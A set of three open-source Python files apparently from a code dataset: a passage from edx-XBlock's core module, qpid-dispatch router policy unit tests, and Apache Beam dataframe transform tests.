for name, class_ in cls.load_classes(fail_silently):
if tag in class_._class_tags:
yield name, class_
def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
"""
Construct a new XBlock.
This class should only be instantiated by runtimes.
Arguments:
runtime (:class:`.Runtime`): Use it to access the environment.
It is available in XBlock code as ``self.runtime``.
field_data (:class:`.FieldData`): Interface used by the XBlock
fields to access their data from wherever it is persisted.
Deprecated.
scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
scopes.
"""
if scope_ids is UNSET:
raise TypeError('scope_ids are required')
# Provide backwards compatibility for external access through _field_data
super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)
def render(self, view, context=None):
"""Render `view` with this block's runtime and the supplied `context`"""
return self.runtime.render(self, view, context)
def validate(self):
"""
Ask this xblock to validate itself. Subclasses are expected to override this
method, as there is currently only a no-op implementation. Any overriding method
should call super to collect validation results from its superclasses, and then
add any additional results as necessary.
"""
return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
"""
This mixin allows Xblock-like class to declare that it provides aside functionality.
"""
entry_point = "xblock_asides.v1"
@classmethod
def aside_for(cls, view_name):
"""
A decorator to indicate a function is the aside view for the given view_name.
Aside views should have a signature like:
@XBlockAside.aside_for('student_view')
def student_aside(self, block, context=None):
...
return Fragment(...)
"""
# pylint: disable=protected-access
def _decorator(func): # pylint: disable=missing-docstring
if not hasattr(func, '_aside_for'):
func._aside_for = []
func._aside_for.append(view_name) # pylint: disable=protected-access
return func
return _decorator
@class_lazy
def _combined_asides(cls): # pylint: disable=no-self-argument
"""
A dictionary mapping XBlock view names to the aside method that
decorates them (or None, if there is no decorator for the specified view).
"""
# The method declares what views it decorates. We rely on `dir`
# to handle subclasses and overrides.
combined_asides = defaultdict(None)
for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
aside_for = getattr(view_func, '_aside_for', [])
for view in aside_for:
combined_asides[view] = view_func.__name__
return combined_asides
def aside_view_declaration(self, view_name):
"""
Find and return a function object if one is an aside_view for the given view_name
Aside methods declare their view provision via @XBlockAside.aside_for(view_name)
This function finds those declarations for a block.
Arguments:
view_name (string): the name of the view requested.
Returns:
either the function or None
"""
if view_name in self._combined_asides:
return getattr(self, self._combined_asides[view_name])
else:
return None
def needs_serialization(self):
"""
Return True if the aside has any data to serialize to XML.
If all of the aside's data is empty or a default value, then the aside shouldn't
be serialized as XML at all.
"""
return any([field.is_set_on(self) for field in self.fields.itervalues()])
# Maintain backwards compatibility
import xblock.exceptions
class KeyValueMultiSaveError(xblock.exceptions.KeyValueMultiSaveError):
"""
Backwards compatibility class wrapper around :class:`.KeyValueMultiSaveError`.
"""
def __init__(self, *args, **kwargs):
warnings.warn("Please use xblock.exceptions.KeyValueMultiSaveError", DeprecationWarning, stacklevel=2)
super(KeyValueMultiSaveError, self).__init__(*args, **kwargs)
class XBlockSaveError(xblock.exceptions.XBlockSaveError):
"""
Backwards compatibility class wrapper around :class:`.XBlockSaveError`.
"""
def __init__(self, *args, **kwargs):
warnings.warn("Please use xblock.exceptions.XBlockSaveError", DeprecationWarning, stacklevel=2)
super(XBlockSaveError, self).__init__(*args, **kwargs)
| nagyistoce/edx-XBlock | xblock/core.py | Python | apache-2.0 | 9,923 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
from qpid_dispatch_internal.policy.policy_util import HostAddr, is_ipv6_enabled
from qpid_dispatch_internal.policy.policy_util import HostStruct
from qpid_dispatch_internal.policy.policy_util import PolicyError
from qpid_dispatch_internal.policy.policy_util import PolicyAppConnectionMgr
from qpid_dispatch_internal.policy.policy_local import PolicyLocal
from system_test import unittest
from system_test import TestCase, main_module
class PolicyHostAddrTest(TestCase):
def expect_deny(self, badhostname, msg):
denied = False
try:
xxx = HostStruct(badhostname)
except PolicyError:
denied = True
self.assertTrue(denied, ("%s" % msg))
def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):
# check that the string is a match for the addr
# check that the internal struct version matches, too
ha = HostStruct(tString)
if expectOk:
self.assertTrue(tHostAddr.match_str(tString))
self.assertTrue(tHostAddr.match_bin(ha))
else:
self.assertFalse(tHostAddr.match_str(tString))
self.assertFalse(tHostAddr.match_bin(ha))
def test_policy_hostaddr_ipv4(self):
# Create simple host and range
aaa = HostAddr("192.168.1.1")
bbb = HostAddr("1.1.1.1,1.1.1.255")
# Verify host and range
self.check_hostaddr_match(aaa, "192.168.1.1")
self.check_hostaddr_match(aaa, "1.1.1.1", False)
self.check_hostaddr_match(aaa, "192.168.1.2", False)
self.check_hostaddr_match(bbb, "1.1.1.1")
self.check_hostaddr_match(bbb, "1.1.1.254")
self.check_hostaddr_match(bbb, "1.1.1.0", False)
self.check_hostaddr_match(bbb, "1.1.2.0", False)
def test_policy_hostaddr_ipv6(self):
if not is_ipv6_enabled():
self.skipTest("System IPv6 support is not available")
# Create simple host and range
aaa = HostAddr("::1")
bbb = HostAddr("::1,::ffff")
ccc = HostAddr("ffff::0,ffff:ffff::0")
# Verify host and range
self.check_hostaddr_match(aaa, "::1")
self.check_hostaddr_match(aaa, "::2", False)
self.check_hostaddr_match(aaa, "ffff:ffff::0", False)
self.check_hostaddr_match(bbb, "::1")
self.check_hostaddr_match(bbb, "::fffe")
self.check_hostaddr_match(bbb, "::1:0", False)
self.check_hostaddr_match(bbb, "ffff::0", False)
self.check_hostaddr_match(ccc, "ffff::1")
self.check_hostaddr_match(ccc, "ffff:fffe:ffff:ffff::ffff")
self.check_hostaddr_match(ccc, "ffff:ffff::1", False)
self.check_hostaddr_match(ccc, "ffff:ffff:ffff:ffff::ffff", False)
def test_policy_hostaddr_ipv4_wildcard(self):
aaa = HostAddr("*")
self.check_hostaddr_match(aaa, "0.0.0.0")
self.check_hostaddr_match(aaa, "127.0.0.1")
self.check_hostaddr_match(aaa, "255.254.253.252")
def test_policy_hostaddr_ipv6_wildcard(self):
if not is_ipv6_enabled():
self.skipTest("System IPv6 support is not available")
aaa = HostAddr("*")
self.check_hostaddr_match(aaa, "::0")
self.check_hostaddr_match(aaa, "::1")
self.check_hostaddr_match(aaa, "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff")
def test_policy_malformed_hostaddr_ipv4(self):
self.expect_deny("0.0.0.0.0", "Name or service not known")
self.expect_deny("1.1.1.1,2.2.2.2,3.3.3.3", "arg count")
self.expect_deny("9.9.9.9,8.8.8.8", "a > b")
def test_policy_malformed_hostaddr_ipv6(self):
if not is_ipv6_enabled():
self.skipTest("System IPv6 support is not available")
self.expect_deny("1::2::3", "Name or service not known")
self.expect_deny("::1,::2,::3", "arg count")
self.expect_deny("0:ff:0,0:fe:ffff:ffff::0", "a > b")
class QpidDispatch:
def qd_dispatch_policy_c_counts_alloc(self):
return 100
def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):
pass
class MockAgent:
def __init__(self):
self.qd = QpidDispatch()
def add_implementation(self, entity, cfg_obj_name):
pass
class MockPolicyManager:
def __init__(self):
self.agent = MockAgent()
self.logs = []
def log_debug(self, text):
print("DEBUG: %s" % text)
self.logs.append(text)
def log_info(self, text):
print("INFO: %s" % text)
self.logs.append(text)
def log_trace(self, text):
print("TRACE: %s" % text)
self.logs.append(text)
def log_error(self, text):
print("ERROR: %s" % text)
self.logs.append(text)
def log_warning(self, text):
print("WARNING: %s" % text)
self.logs.append(text)
def get_agent(self):
return self.agent
class PolicyFile(TestCase):
manager = MockPolicyManager()
policy = PolicyLocal(manager)
policy.test_load_config()
def test_policy1_test_zeke_ok(self):
p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)
self.assertTrue(p1 == 'test')
upolicy = {}
self.assertTrue(
PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)
)
self.assertTrue(upolicy['maxFrameSize'] == 444444)
self.assertTrue(upolicy['maxMessageSize'] == 444444)
self.assertTrue(upolicy['maxSessionWindow'] == 444444)
self.assertTrue(upolicy['maxSessions'] == 4)
self.assertTrue(upolicy['maxSenders'] == 44)
self.assertTrue(upolicy['maxReceivers'] == 44)
self.assertTrue(upolicy['allowAnonymousSender'])
self.assertTrue(upolicy['allowDynamicSource'])
self.assertTrue(upolicy['targets'] == 'a,private,')
self.assertTrue(upolicy['sources'] == 'a,private,')
def test_policy1_test_zeke_bad_IP(self):
self.assertTrue(
PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', "connid", 2) == '')
self.assertTrue(
PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', "connid", 3) == '')
self.assertTrue(
PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', "connid", 4) == '')
def test_policy1_test_zeke_bad_app(self):
self.assertTrue(
PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')
def test_policy1_test_users_same_permissions(self):
zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)
yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)
self.assertTrue(zname == yname)
def test_policy1_lookup_unknown_application(self):
upolicy = {}
self.assertFalse(
PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)
)
def test_policy1_lookup_unknown_usergroup(self):
upolicy = {}
self.assertFalse(
PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)
)
class PolicyFileApplicationFallback(TestCase):
manager = MockPolicyManager()
policy = PolicyLocal(manager)
policy.test_load_config()
def test_bad_app_fallback(self):
# Show that with no fallback the user cannot connect
self.assertTrue(
self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')
# Enable the fallback defaultVhost and show the same user can now connect
self.policy.set_default_vhost('photoserver')
settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5)
self.assertTrue(settingsname == 'test')
# Show that the fallback settings are returned
upolicy = {}
self.assertTrue(
self.policy.lookup_settings('phony*app*name', settingsname, upolicy)
)
self.assertTrue(upolicy['maxFrameSize'] == 444444)
self.assertTrue(upolicy['maxMessageSize'] == 444444)
self.assertTrue(upolicy['maxSessionWindow'] == 444444)
self.assertTrue(upolicy['maxSessions'] == 4)
self.assertTrue(upolicy['maxSenders'] == 44)
self.assertTrue(upolicy['maxReceivers'] == 44)
self.assertTrue(upolicy['allowAnonymousSender'])
self.assertTrue(upolicy['allowDynamicSource'])
self.assertTrue(upolicy['targets'] == 'a,private,')
self.assertTrue(upolicy['sources'] == 'a,private,')
# Disable fallback and show failure again
self.policy.set_default_vhost('')
self.assertTrue(
self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', "connid", 5) == '')
class PolicyAppConnectionMgrTests(TestCase):
def test_policy_app_conn_mgr_fail_by_total(self):
stats = PolicyAppConnectionMgr(1, 2, 2)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 1)
self.assertIn('application connection limit', diags[0])
def test_policy_app_conn_mgr_fail_by_user(self):
stats = PolicyAppConnectionMgr(3, 1, 2)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 1)
self.assertIn('per user', diags[0])
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))
self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))
def test_policy_app_conn_mgr_fail_by_hosts(self):
stats = PolicyAppConnectionMgr(3, 2, 1)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 1)
self.assertIn('per host', diags[0])
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))
self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))
def test_policy_app_conn_mgr_fail_by_user_hosts(self):
stats = PolicyAppConnectionMgr(3, 1, 1)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 2)
success = 'per user' in diags[0] or 'per user' in diags[1]
self.assertTrue(success)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))
self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))
def test_policy_app_conn_mgr_update(self):
stats = PolicyAppConnectionMgr(3, 1, 2)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 1)
self.assertIn('per user', diags[0])
diags = []
stats.update(3, 2, 2)
self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
def test_policy_app_conn_mgr_disconnect(self):
stats = PolicyAppConnectionMgr(3, 1, 2)
diags = []
self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))
self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
self.assertTrue(len(diags) == 1)
self.assertIn('per user', diags[0])
diags = []
stats.disconnect("10.10.10.10:10000", 'chuck', '10.10.10.10')
self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))
def test_policy_app_conn_mgr_create_bad_settings(self):
denied = False
try:
stats = PolicyAppConnectionMgr(-3, 1, 2)
except PolicyError:
denied = True
self.assertTrue(denied, "Failed to detect negative setting value.")
def test_policy_app_conn_mgr_update_bad_settings(self):
denied = False
try:
stats = PolicyAppConnectionMgr(0, 0, 0)
except PolicyError:
denied = True
self.assertFalse(denied, "Should allow all zeros.")
try:
stats.update(0, -1, 0)
except PolicyError:
denied = True
self.assertTrue(denied, "Failed to detect negative setting value.")
def test_policy_app_conn_mgr_larger_counts(self):
stats = PolicyAppConnectionMgr(10000, 10000, 10000)
diags = []
for i in range(0, 10000):
self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))
self.assertTrue(len(diags) == 0)
self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))
self.assertTrue(len(diags) == 3)
self.assertTrue(stats.connections_active == 10000)
self.assertTrue(stats.connections_approved == 10000)
self.assertTrue(stats.connections_denied == 1)
class PolicyAliases(TestCase):
#
def test_AliasesRenameOwnVhost(self):
config_str = """
[{
"hostname": "$default",
"allowUnknownUser": true,
"aliases": "$default",
"groups": {
"$default": {
"remoteHosts": "*",
"allowDynamicSource": true,
"allowAnonymousSender": true,
"sources": "$management, examples, q1",
"targets": "$management, examples, q1",
"maxSessions": 1
}
}
}]
"""
manager = MockPolicyManager()
policy = PolicyLocal(manager)
ruleset = json.loads(config_str)
denied = False
try:
policy.create_ruleset(ruleset[0])
except PolicyError:
denied = True
self.assertTrue(denied, "Ruleset duplicates vhost and alias but condition not detected.")
#
def test_SameAliasOnTwoVhosts(self):
config_str = """
[{
"hostname": "$default",
"aliases": "a,b,c,d,e",
"groups": {
"$default": {
"maxSessions": 1
}
}
},
{
"hostname": "doshormigas",
"aliases": "i,h,g,f,e",
"groups": {
"$default": {
"maxSessions": 1
}
}
}]
"""
manager = MockPolicyManager()
policy = PolicyLocal(manager)
ruleset = json.loads(config_str)
denied = False
try:
policy.create_ruleset(ruleset[0])
policy.create_ruleset(ruleset[1])
except PolicyError as e:
denied = True
self.assertTrue(denied, "Rulesets duplicate same alias in two vhosts but condition not detected.")
#
def test_AliasConflictsWithVhost(self):
config_str = """
[{
"hostname": "$default",
"groups": {
"$default": {
"maxSessions": 1
}
}
},
{
"hostname": "conflict-with-vhost",
"aliases": "$default",
"groups": {
"$default": {
"maxSessions": 1
}
}
}]
"""
manager = MockPolicyManager()
policy = PolicyLocal(manager)
ruleset = json.loads(config_str)
denied = False
try:
policy.create_ruleset(ruleset[0])
policy.create_ruleset(ruleset[1])
except PolicyError as e:
denied = True
self.assertTrue(denied, "Ruleset alias names other vhost but condition not detected.")
#
def test_AliasOperationalLookup(self):
manager = MockPolicyManager()
policy = PolicyLocal(manager)
policy.test_load_config()
# For this test the test config defines vhost 'photoserver'.
# This test accesses that vhost using the alias name 'antialias'.
settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', "connid", 5)
self.assertTrue(settingsname == 'test')
upolicy = {}
self.assertTrue(
policy.lookup_settings('antialias', settingsname, upolicy)
)
self.assertTrue(upolicy['maxFrameSize'] == 444444)
self.assertTrue(upolicy['sources'] == 'a,private,')
if __name__ == '__main__':
unittest.main(main_module())
| ChugR/qpid-dispatch | tests/router_policy_test.py | Python | apache-2.0 | 17,771 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
import unittest
import pandas as pd
import apache_beam as beam
from apache_beam import coders
from apache_beam.dataframe import convert
from apache_beam.dataframe import expressions
from apache_beam.dataframe import frame_base
from apache_beam.dataframe import transforms
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
def check_correct(expected, actual):
if actual is None:
raise AssertionError('Empty frame but expected: \n\n%s' % (expected))
if isinstance(expected, pd.core.generic.NDFrame):
expected = expected.sort_index()
actual = actual.sort_index()
if isinstance(expected, pd.Series):
pd.testing.assert_series_equal(expected, actual)
elif isinstance(expected, pd.DataFrame):
pd.testing.assert_frame_equal(expected, actual)
else:
raise ValueError(
f"Expected value is a {type(expected)},"
"not a Series or DataFrame.")
else:
if actual != expected:
raise AssertionError('Scalars not equal: %s != %s' % (actual, expected))
def concat(parts):
if len(parts) > 1:
return pd.concat(parts)
elif len(parts) == 1:
return parts[0]
else:
return None
def df_equal_to(expected):
return lambda actual: check_correct(expected, concat(actual))
AnimalSpeed = typing.NamedTuple(
'AnimalSpeed', [('Animal', str), ('Speed', int)])
coders.registry.register_coder(AnimalSpeed, coders.RowCoder)
Nested = typing.NamedTuple(
'Nested', [('id', int), ('animal_speed', AnimalSpeed)])
coders.registry.register_coder(Nested, coders.RowCoder)
class TransformTest(unittest.TestCase):
def run_scenario(self, input, func):
expected = func(input)
empty = input.iloc[0:0]
input_placeholder = expressions.PlaceholderExpression(empty)
input_deferred = frame_base.DeferredFrame.wrap(input_placeholder)
actual_deferred = func(input_deferred)._expr.evaluate_at(
expressions.Session({input_placeholder: input}))
check_correct(expected, actual_deferred)
with beam.Pipeline() as p:
input_pcoll = p | beam.Create([input.iloc[::2], input.iloc[1::2]])
input_df = convert.to_dataframe(input_pcoll, proxy=empty)
output_df = func(input_df)
output_proxy = output_df._expr.proxy()
if isinstance(output_proxy, pd.core.generic.NDFrame):
self.assertTrue(
output_proxy.iloc[:0].equals(expected.iloc[:0]),
(
'Output proxy is incorrect:\n'
f'Expected:\n{expected.iloc[:0]}\n\n'
f'Actual:\n{output_proxy.iloc[:0]}'))
else:
self.assertEqual(type(output_proxy), type(expected))
output_pcoll = convert.to_pcollection(output_df, yield_elements='pandas')
assert_that(
output_pcoll, lambda actual: check_correct(expected, concat(actual)))
def test_identity(self):
df = pd.DataFrame({
'Animal': ['Falcon', 'Falcon', 'Parrot', 'Parrot'],
'Speed': [380., 370., 24., 26.]
})
self.run_scenario(df, lambda x: x)
def test_groupby_sum_mean(self):
df = pd.DataFrame({
'Animal': ['Falcon', 'Falcon', 'Parrot', 'Parrot'],
'Speed': [380., 370., 24., 26.]
})
self.run_scenario(df, lambda df: df.groupby('Animal').sum())
with expressions.allow_non_parallel_operations():
self.run_scenario(df, lambda df: df.groupby('Animal').mean())
self.run_scenario(
df, lambda df: df.loc[df.Speed > 25].groupby('Animal').sum())
def test_groupby_apply(self):
df = pd.DataFrame({
'group': ['a' if i % 5 == 0 or i % 3 == 0 else 'b' for i in range(100)],
'foo': [None if i % 11 == 0 else i for i in range(100)],
'bar': [None if i % 7 == 0 else 99 - i for i in range(100)],
'baz': [None if i % 13 == 0 else i * 2 for i in range(100)],
})
def median_sum_fn(x):
return (x.foo + x.bar).median()
describe = lambda df: df.describe()
self.run_scenario(df, lambda df: df.groupby('group').foo.apply(describe))
self.run_scenario(
df, lambda df: df.groupby('group')[['foo', 'bar']].apply(describe))
self.run_scenario(df, lambda df: df.groupby('group').apply(median_sum_fn))
self.run_scenario(
df,
lambda df: df.set_index('group').foo.groupby(level=0).apply(describe))
self.run_scenario(df, lambda df: df.groupby(level=0).apply(median_sum_fn))
self.run_scenario(
df, lambda df: df.groupby(lambda x: x % 3).apply(describe))
def test_filter(self):
df = pd.DataFrame({
'Animal': ['Aardvark', 'Ant', 'Elephant', 'Zebra'],
'Speed': [5, 2, 35, 40]
})
self.run_scenario(df, lambda df: df.filter(items=['Animal']))
self.run_scenario(df, lambda df: df.filter(regex='Anim.*'))
self.run_scenario(
df, lambda df: df.set_index('Animal').filter(regex='F.*', axis='index'))
with expressions.allow_non_parallel_operations():
a = pd.DataFrame({'col': [1, 2, 3]})
self.run_scenario(a, lambda a: a.agg(sum))
self.run_scenario(a, lambda a: a.agg(['mean', 'min', 'max']))
def test_scalar(self):
with expressions.allow_non_parallel_operations():
a = pd.Series([1, 2, 6])
self.run_scenario(a, lambda a: a.agg(sum))
self.run_scenario(a, lambda a: a / a.agg(sum))
# Tests scalar being used as an input to a downstream stage.
df = pd.DataFrame({'key': ['a', 'a', 'b'], 'val': [1, 2, 6]})
self.run_scenario(
df, lambda df: df.groupby('key').sum().val / df.val.agg(sum))
def test_getitem_projection(self):
df = pd.DataFrame({
'Animal': ['Aardvark', 'Ant', 'Elephant', 'Zebra'],
'Speed': [5, 2, 35, 40],
'Size': ['Small', 'Extra Small', 'Large', 'Medium']
})
self.run_scenario(df, lambda df: df[['Speed', 'Size']])
def test_offset_elementwise(self):
s = pd.Series(range(10)).astype(float)
df = pd.DataFrame({'value': s, 'square': s * s, 'cube': s * s * s})
# Only those values that are both squares and cubes will intersect.
self.run_scenario(
df,
lambda df: df.set_index('square').value + df.set_index('cube').value)
def test_batching_named_tuple_input(self):
with beam.Pipeline() as p:
result = (
p | beam.Create([
AnimalSpeed('Aardvark', 5),
AnimalSpeed('Ant', 2),
AnimalSpeed('Elephant', 35),
AnimalSpeed('Zebra', 40)
]).with_output_types(AnimalSpeed)
| transforms.DataframeTransform(lambda df: df.filter(regex='Anim.*')))
assert_that(
result,
equal_to([('Aardvark', ), ('Ant', ), ('Elephant', ), ('Zebra', )]))
def test_batching_beam_row_input(self):
with beam.Pipeline() as p:
result = (
p
| beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (u'Parrot', 24.),
(u'Parrot', 26.)])
| beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1]))
| transforms.DataframeTransform(
lambda df: df.groupby('Animal').mean(), include_indexes=True))
assert_that(result, equal_to([('Falcon', 375.), ('Parrot', 25.)]))
def test_batching_beam_row_to_dataframe(self):
with beam.Pipeline() as p:
df = convert.to_dataframe(
p
| beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (
u'Parrot', 24.), (u'Parrot', 26.)])
| beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1])))
result = convert.to_pcollection(
df.groupby('Animal').mean(), include_indexes=True)
assert_that(result, equal_to([('Falcon', 375.), ('Parrot', 25.)]))
def test_batching_passthrough_nested_schema(self):
with beam.Pipeline() as p:
nested_schema_pc = (
p | beam.Create([Nested(1, AnimalSpeed('Aardvark', 5))
]).with_output_types(Nested))
result = nested_schema_pc | transforms.DataframeTransform( # pylint: disable=expression-not-assigned
lambda df: df.filter(items=['animal_speed']))
assert_that(result, equal_to([(('Aardvark', 5), )]))
def test_batching_passthrough_nested_array(self):
Array = typing.NamedTuple(
'Array', [('id', int), ('business_numbers', typing.Sequence[int])])
coders.registry.register_coder(Array, coders.RowCoder)
with beam.Pipeline() as p:
array_schema_pc = (p | beam.Create([Array(1, [7, 8, 9])]))
result = array_schema_pc | transforms.DataframeTransform( # pylint: disable=expression-not-assigned
lambda df: df.filter(items=['business_numbers']))
assert_that(result, equal_to([([7, 8, 9], )]))
def test_unbatching_series(self):
with beam.Pipeline() as p:
result = (
p
| beam.Create([(u'Falcon', 380.), (u'Falcon', 370.), (u'Parrot', 24.),
(u'Parrot', 26.)])
| beam.Map(lambda tpl: beam.Row(Animal=tpl[0], Speed=tpl[1]))
| transforms.DataframeTransform(lambda df: df.Animal))
assert_that(result, equal_to(['Falcon', 'Falcon', 'Parrot', 'Parrot']))
def test_input_output_polymorphism(self):
one_series = pd.Series([1])
two_series = pd.Series([2])
three_series = pd.Series([3])
proxy = one_series[:0]
def equal_to_series(expected):
def check(actual):
actual = pd.concat(actual)
if not expected.equals(actual):
raise AssertionError(
'Series not equal: \n%s\n%s\n' % (expected, actual))
return check
with beam.Pipeline() as p:
one = p | 'One' >> beam.Create([one_series])
two = p | 'Two' >> beam.Create([two_series])
assert_that(
one | 'PcollInPcollOut' >> transforms.DataframeTransform(
lambda x: 3 * x, proxy=proxy, yield_elements='pandas'),
equal_to_series(three_series),
label='CheckPcollInPcollOut')
assert_that(
(one, two)
| 'TupleIn' >> transforms.DataframeTransform(
lambda x, y: (x + y), (proxy, proxy), yield_elements='pandas'),
equal_to_series(three_series),
label='CheckTupleIn')
assert_that(
dict(x=one, y=two)
| 'DictIn' >> transforms.DataframeTransform(
lambda x,
y: (x + y),
proxy=dict(x=proxy, y=proxy),
yield_elements='pandas'),
equal_to_series(three_series),
label='CheckDictIn')
double, triple = one | 'TupleOut' >> transforms.DataframeTransform(
lambda x: (2*x, 3*x), proxy, yield_elements='pandas')
assert_that(double, equal_to_series(two_series), 'CheckTupleOut0')
assert_that(triple, equal_to_series(three_series), 'CheckTupleOut1')
res = one | 'DictOut' >> transforms.DataframeTransform(
lambda x: {'res': 3 * x}, proxy, yield_elements='pandas')
assert_that(res['res'], equal_to_series(three_series), 'CheckDictOut')
def test_cat(self):
# verify that cat works with a List[Series] since this is
# missing from doctests
df = pd.DataFrame({
'one': ['A', 'B', 'C'],
'two': ['BB', 'CC', 'A'],
'three': ['CCC', 'AA', 'B'],
})
self.run_scenario(df, lambda df: df.two.str.cat([df.three], join='outer'))
self.run_scenario(
df, lambda df: df.one.str.cat([df.two, df.three], join='outer'))
def test_repeat(self):
# verify that repeat works with a Series since this is
# missing from doctests
df = pd.DataFrame({
'strings': ['A', 'B', 'C', 'D', 'E'],
'repeats': [3, 1, 4, 5, 2],
})
self.run_scenario(df, lambda df: df.strings.str.repeat(df.repeats))
def test_rename(self):
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
self.run_scenario(
df, lambda df: df.rename(columns={'B': 'C'}, index={
0: 2, 2: 0
}))
with expressions.allow_non_parallel_operations():
self.run_scenario(
df,
lambda df: df.rename(
columns={'B': 'C'}, index={
0: 2, 2: 0
}, errors='raise'))
class TransformPartsTest(unittest.TestCase):
def test_rebatch(self):
with beam.Pipeline() as p:
sA = pd.Series(range(1000))
sB = sA * sA
pcA = p | 'CreatePCollA' >> beam.Create([('k0', sA[::3]),
('k1', sA[1::3]),
('k2', sA[2::3])])
pcB = p | 'CreatePCollB' >> beam.Create([('k0', sB[::3]),
('k1', sB[1::3]),
('k2', sB[2::3])])
input = {'A': pcA, 'B': pcB} | beam.CoGroupByKey()
output = input | beam.ParDo(
transforms._ReBatch(target_size=sA.memory_usage()))
# There should be exactly two elements, as the target size will be
# hit when 2/3 of pcA and 2/3 of pcB is seen, but not before.
assert_that(output | beam.combiners.Count.Globally(), equal_to([2]))
# Sanity check that we got all the right values.
assert_that(
output | beam.Map(lambda x: x['A'].sum())
| 'SumA' >> beam.CombineGlobally(sum),
equal_to([sA.sum()]),
label='CheckValuesA')
assert_that(
output | beam.Map(lambda x: x['B'].sum())
| 'SumB' >> beam.CombineGlobally(sum),
equal_to([sB.sum()]),
label='CheckValuesB')
if __name__ == '__main__':
unittest.main()
| lukecwik/incubator-beam | sdks/python/apache_beam/dataframe/transforms_test.py | Python | apache-2.0 | 14,277 |
